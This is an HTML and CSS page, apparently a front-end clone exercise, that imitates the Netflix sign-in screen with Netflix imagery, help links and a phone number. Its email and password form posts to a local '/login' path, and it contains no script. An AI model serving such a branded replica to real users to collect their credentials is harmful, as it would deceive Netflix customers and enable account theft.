<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sign In - Netflix</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color:black;
            color: #fff;
            line-height: 1.6;
            margin: 0;
            
        }

        .container {
            width: 333px;
            margin: 0 auto;
            background-color: black;
            padding: 48px 68px;
            border-radius: 8px;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.1);
            height: 707px;
            align-items: center;
            opacity: 0.8;
            position: absolute;
            top: 5%;
            text-align: center;
            display: flex;
            flex-direction: column;
            gap: 10px;
            left: 20%;
            right: 20%; 
            justify-content: center;
            align-items: center;
        }
        h1 {
            display: block;
            font-size: 2em;
            margin-block-start: 2px;
            margin-block-end: 31px;
            margin-inline-start: -55px;
            margin-inline-end: 173px;
            font-weight: bold;
            unicode-bidi: isolate;
}
        h1 {
            text-align: center;
            color: #fff;
        }

        form {
            display: flex;
            flex-direction: column;
        }

        label {
            margin-bottom: 5px;
            color: #fff;
        }

        input {
            padding: 22px;
            margin-bottom: 10px;
            border: 1px solid red;
            border-radius: 5px;
            background-color: black;
        }

        button {
            padding: 10px;
            border: none;
            border-radius: 5px;
            background-color: #e50914;
            color: #fff;
            cursor: pointer;
            margin-bottom: 10px;
            height: 46px;
            font-size: medium;
        }

        button:hover {
            background-color: #b2070f;
        }

        .forgot-password {
            text-align: right;
            margin-bottom: 10px;
        }
        .forgot-password a {
            margin: 80px;
            font-size: larger;
            margin-top: 20px;
        }

        .remember-me {
            margin-bottom: 10px;
            margin-top: 10px;
            font-size: medium;
        }

        .new-to-netflix {
            text-align: center;
        }

        a {
            color: #fff;
            text-decoration: none;
            margin-top: 10px;
        }

        p {
            font-size: 14px;
            color: #555;
            text-align: center;
            margin-top: 10px;
        }
        .hero {
            text-align: center;
            justify-content: center;
        }
        .hero__bg__image {
            width: 100%;
            height: 100%;
            opacity:0.6;
            }
        .bg_cont {
            max-width: 1600px;
            margin: 0 auto;
            padding: 0 0;
        }
        .navbar ul{
            overflow: auto;
         }
         .navbar li{
            float: left;
            list-style: none;
            margin: 13px 20px;
         }
         .navbar li a{
            padding: 50px 50px;
            text-decoration: none;
            color:white;
            text-align: center;
         }
         .navibar li a {
            padding: 50px 30px ;
            text-decoration: none;
            color:white;
            text-align: center;
         }
    </style>
</head>
<body>
    <div class="bg_cont">
        <section class="hero">
            <div class="hero__bg__image__container">
                <img
                  src="https://assets.nflxext.com/ffe/siteui/vlv3/9c5457b8-9ab0-4a04-9fc1-e608d5670f1a/710d74e0-7158-408e-8d9b-23c219dee5df/IN-en-20210719-popsignuptwoweeks-perspective_alpha_website_small.jpg"
                  alt="BG hero image"
                  class="hero__bg__image"/>
    </div>
    <div class="container">
        <h1>Sign In</h1>
        <form action="/login" method="POST">
            <label for="emailPhone"></label>
            <input type="text" id="emailPhone" placeholder="Email or Phone Number" name="emailPhone" required>

            <label for="password"></label>
            <input type="password" id="password" placeholder="Password" name="password" required>
            <p>Your password must contain between 4 and 60 characters.</p> 

            <button class="OR" type="submit">Sign In</button>
             <P>OR</P>
            <button type="button">Use a Sign In Code</button>
            <br>

            <div class="forgot-password">
                <a href="/forgot-password">Forgot Password?</a>
                
            </div>

            <div class="remember-me">
                <input type="checkbox" id="rememberMe" name="rememberMe">
                <label for="rememberMe">Remember Me</label>
            </div>

            <p class="new-to-netflix">New to Netflix? <a href="/sign-up">Sign Up Now</a></p>

            <p>This page is protected by Google reCAPTCHA to ensure you're not a bot. <a href="https://www.google.com/recaptcha/about/">Learn More</a></p>
        </form>
    </div>
     <footer>
        <nav class="navbar">
            <ul>
                <li><a href="https://help.netflix.com/support/412" ></a>FAQ</li>
                <li><a href="https://help.netflix.com/"></a>Help Centre</li>
                <li><a href="https://help.netflix.com/legal/termsofuse"></a>Terms of Use</li>
                <li><a href="https://help.netflix.com/legal/privacy"></a> Privacy</li>
                <li><a href="https://www.netflix.com/login#">Cookie Preferences</a></li>
                <li><a href="https://help.netflix.com/legal/corpinfo"></a>Corporate Information</li>
            </ul>
        </nav>
    <div >
        <p><a href="tel:000-800-919-1694"></a>Questions? Call 000-800-919-1694</p>
    </div>
     </footer> 
</body>
</html>
